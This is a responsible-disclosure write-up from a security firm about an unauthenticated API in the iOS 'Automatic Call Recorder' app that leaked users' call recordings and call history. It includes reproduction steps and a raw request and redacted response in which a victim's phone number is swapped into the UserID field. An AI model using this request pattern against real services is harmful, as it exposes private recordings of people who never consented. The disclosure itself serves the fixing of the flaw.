This vulnerability was responsibly disclosed by Anand Prakash, PingSafe, and is now fixed. Special thanks to Zack Whittaker from TechCrunch for helping us with the entire disclosure process and helping in getting this critical vulnerability fixed.The “Automatic call recorder” application is one of the popular applications used by iPhone users to record their calls. The app is among top-grossing in the Business category of App Store currently #15 in the downloads in the Business Category worldwide.
Summary:
We discovered this vulnerability while doing open-source intelligence across mobile applications in different categories. PingSafe decompiled the IPA file and figured out S3 buckets, hostnames, and other sensitive details used by the application. The vulnerability allowed any malicious actor to listen to any user’s call recording from the cloud storage bucket of the application and an unauthenticated API endpoint that leaked the cloud storage URL of the victim’s data.
Vulnerability Details:
This vulnerability existed in the “/fetch-sinch-recordings.php” API endpoint of the “Automatic Call Recorder” application. An attacker can pass another user’s number in the recordings request and the API will respond with the recording url of the storage bucket without any authentication. It also leaks the victim’s entire call history and the numbers on which calls were made.
Steps to Reproduce:
- Install the “Automatic Call Recorder” application on your phone.
- Intercept application’s traffic in Burp Suite/Zap Proxy.
- You will observe a POST API request to 167.88.123.157:80/fetch-sinch-recordings.php change UserID to victim’s phone number with country code.
- The response will have an s3 url for the recording and other sensitive details.
Vulnerable Request:
POST /fetch-sinch-recordings.php HTTP/1.1
Host: 167.88.123.157:80_
Content-Type: application/json
Connection: closeAccept: */*
User-Agent: CallRecorder/2.25 (com.arun.callrecorderadvanced; build:1; iOS 14.4.0) Alamofire/4.7.3
Accept-Language: en-IN;q=1.0, kn-IN;q=0.9, hi-IN;q=0.8, hi-Latn-IN;q=0.7
Content-Length: 72Accept-Encoding: gzip, deflate_
{“UserID”: “xxxxxx”,“AppID”: “xxx”}
Response:
****HTTP/1.1 200 OKServer: Apache/2.4.18 (Ubuntu)Content-Length: 413Connection: closeContent-Type: application/json
[{“start_time”: “1604681”,“start_time_iso”: “2019–10–01T17:58:54+0100”,“caller_number”: “xxxxxxx”,“callee”: “+xxxxxxxxx”,“marked_as_deleted”: “0”,“user_id”: “xxxxxxxxxx”,“sinch_app_id”: “xxxxxxxxxxxx”,“call_id”: “xxxxxxx”,
“s3_key”: “call_recordings/1011101/xyzrecording.wav”}]
Timelines:
Feb 27th, 2021 09:20 PM IST — Vulnerability discovered by Anand Prakash from PingSafe Feb 27th, 2021 10:34 PM IST- The company did not have any responsible disclosure program. Reached out to Zack Whittaker for help in the responsible disclosure. Issue forwarded to the developer.
March 6th, 2021 1:16 AM IST — Confirmation from TechCrunch that the new build will get published anytime soon by the developer.
March 6th, 2021 08:52 PM IST — Bug is fixed and the new version is made live on App Store. Security issues like this are catastrophic in nature. Along with impacting customers’ privacy, these also dents the company’s image and provide an added advantage to the competitors.
This article was first published here
About Us:
PingSafe is a cloud-agnostic, agentless CSPM & CWPP solution that continuously detects and prevents vulnerabilities that have the highest probability of being exploited in Azure, AWS, Google Cloud, and Kubernetes.
Reach out to us at hello@pingsafe.com